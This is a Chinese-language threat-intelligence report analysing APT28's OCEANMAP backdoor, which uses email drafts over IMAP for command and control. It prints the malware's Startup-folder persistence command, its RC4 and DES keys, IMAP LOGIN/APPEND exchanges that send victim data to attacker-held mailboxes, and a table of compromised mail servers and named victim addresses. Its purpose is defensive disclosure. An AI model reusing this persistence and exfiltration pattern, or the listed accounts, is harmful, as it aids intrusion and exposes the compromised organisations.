新手法!APT28组织最新后门内置大量被控邮箱(可成功登录)用于窃取数据
字数 3384 2025-08-05 11:39:45
APT28组织OCEANMAP后门技术分析报告
概述
APT28组织(又名Fancy Bear)近期使用了一款名为OCEANMAP的新型后门工具,该后门通过邮件系统进行C2通信,具有独特的数据窃取机制。本报告将详细分析该后门的技术特点、通信模型和防御建议。
样本基本信息
样本版本分类
根据分析,OCEANMAP后门可分为三个主要版本:
-
第一版本:
- 加解密算法:RC4+Base64
- 命名空间:imap_chanel
- 支持命令:change_
-
第二版本:
- 加解密算法:DES+Base64
- 命名空间:sxd
- 支持命令:changesecond、newtime
-
第三版本:
- 加解密算法:Base64
- 命名空间:VMSearch
- 支持命令:changesecond、newtime
样本哈希列表
| Hash | 编译时间(伪造) | 版本类型 |
|---|---|---|
| 2b8047743f3c70c8be106bb795ed6e9d | 2042-04-21 07:16:44 | 第一版本 |
| a5f3883d1f3d0072d316df9411694fb2 | 2042-04-21 07:16:44 | 第一版本 |
| 96bb5d48c7b991175ac38f8699ed4012 | 2042-04-21 07:16:44 | 第一版本 |
| 6d8ec301bff06bc347540f286587629e | 2042-04-21 07:16:44 | 第一版本 |
| bc2866c331d58d255b4e7e95db928a43 | 2063-06-19 17:34:05 | 第一版本 |
| d256798ac5b5b60a31d52b8e8281bc77 | 2086-10-11 10:33:36 | 第一版本 |
| 0fd132d93fd85b4668a97295cc6c7737 | 2086-10-11 10:33:36 | 第一版本 |
| b711ade716c30f83d7631ac00bf754dd | 2086-10-11 10:33:36 | 第一版本 |
| 0a0355d5fad8c5437ea79f56db152274 | 2070-11-24 12:28:05 | 第二版本 |
| 5db75e816b4cef5cc457f0c9e3fc4100 | 2068-05-18 16:52:37 | 第三版本 |
技术分析
持久化机制
-
自启动方式:
- 第一、二版本:将自身移动至启动目录
move /Y email.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\email.exe"- 第三版本:在启动目录中创建快捷方式
-
初始化操作:
- 检查同名进程并终止
- 检查文件名是否包含"_tmp.exe"字符串
- 重命名文件并执行
内置邮箱账户信息
所有版本均内置了多个邮箱账户信息,用于C2通信。这些邮箱账户已被确认可成功登录,表明APT28组织已完全控制这些邮箱服务器。
用户ID生成机制
后门运行后会根据主机信息生成唯一用户ID:
- 主机名
- 用户名
- 系统版本
该ID用于标识受害者并作为邮件主题的一部分。
初始命令执行
后门运行后会执行内置初始命令并通过邮件返回结果:
| Hash | 内置初始命令 |
|---|---|
| 5db75e816b4cef5cc457f0c9e3fc4100 | dir |
| 2b8047743f3c70c8be106bb795ed6e9d | qwinsta |
| a5f3883d1f3d0072d316df9411694fb2 | qwinsta |
| bc2866c331d58d255b4e7e95db928a43 | dir |
| d256798ac5b5b60a31d52b8e8281bc77 | dir |
| 0fd132d93fd85b4668a97295cc6c7737 | dir |
| 96bb5d48c7b991175ac38f8699ed4012 | qwinsta |
| 0a0355d5fad8c5437ea79f56db152274 | dir |
| 6d8ec301bff06bc347540f286587629e | qwinsta |
| b711ade716c30f83d7631ac00bf754dd | dir |
远控指令接收机制
后门从邮箱草稿箱提取远控指令:
- 搜索邮件主题包含用户ID的邮件
- 提取邮件内容并解密
- 执行解密后的命令
加解密算法
-
第一版本 - RC4+Base64:
- RC4密钥:
8C18634C6374CE4E75F155F806808F0532FEF8A8472DB2543390A3A48CB69B7CB143BCE139919D33C209220170F0D98FDE4FA497F668EC180AE29F13DBECE33E97D5E8438619CE70283DDC0A392A27193A043E026FC45EB39A44F3526F80F720F3966AA171BE577483BE7D1CF60B50CC96BA56FEE54909A319E3C945B342B89EADA490EA8631908F2E2871EF556BF121E61DE9351E41D19D24714BD071AA3E22CEE916D08459D9071670B61603128A5C2D5781086DB11E5580CC55CBEE716791C36986B91086305FA4E47D8EE370E8F1722CA8CDA944ED8E2550F29CA285EC63CD893A123101CB927CE9B79647AE331726066D6264280C9A4AE540C279986669 -
第二版本 - DES+Base64:
- DES-CBC密钥:
key: 4862714339216D56 IV: 1C0B330C201A0729 -
第三版本 - Base64:
- 仅使用Base64编码,无额外加密
远控指令
目前发现两个主要远控指令:
changesecond/change_:修改内置邮箱账户信息newtime:修改程序休眠时间
通信模型分析
IMAP协议指令
-
第一版本:
$ LOGIN test1@xx.com 123456 $ APPEND Inbox {772} From: admin Subject: [时间戳]_report_[用户ID] [加密内容] -
第二版本:
$ LOGIN test1@xx.com 123456 $ APPEND INBOX {530} From: n_admin Subject: a___[时间戳]_report_[用户ID] [加密内容] -
第三版本:
$ LOGIN test1@xx.com 123456 $ APPEND INBOX {686} From: U_admin Subject:[时间戳]_report_[用户ID] [明文内容]
被控邮箱信息
分析发现多个被控邮箱服务器和账户:
| 邮件服务器 | 邮箱 | 样本哈希 |
|---|---|---|
| 95.211.60.177 | a_alqenaei@ctc.gov.kw | 2b804... |
| mail.assarain.com | k.alshukairi@assarain.com | 2b804... |
| 195.229.241.219 | peter.williams@adu.ac.ae | a5f38... |
| 213.202.212.220 | submission@universalexpress.com.pk | a5f38... |
| 64.90.62.162 | tickets_finance@riyadhpe.com | bc286... |
| mail.afcoop.ae | project@afcoop.ae | d2567... |
| 74.124.219.71 | jrb@bahouholdings.com | 5db75... |
| webmail.facadesolutionsuae.com | qasim.m@facadesolutionsuae.com | 5db75... |
防御建议
-
网络监控:
- 监控异常IMAP协议通信
- 特别关注与已知被控邮件服务器的连接
-
终端防护:
- 检测启动目录中的可疑可执行文件
- 监控异常进程创建行为
-
邮件安全:
- 加强邮件服务器认证机制
- 定期更换邮箱密码
- 禁用弱加密算法
-
威胁情报:
- 将报告中提供的IoC加入威胁情报库
- 关注APT28组织的最新TTPs
-
安全意识:
- 培训员工识别可疑邮件
- 避免使用相同密码跨多个系统
结论
OCEANMAP后门展示了APT28组织在隐蔽通信方面的创新能力,通过滥用合法邮件服务实现C2通信,有效规避传统网络检测。安全团队应充分了解其工作原理,部署针对性防御措施。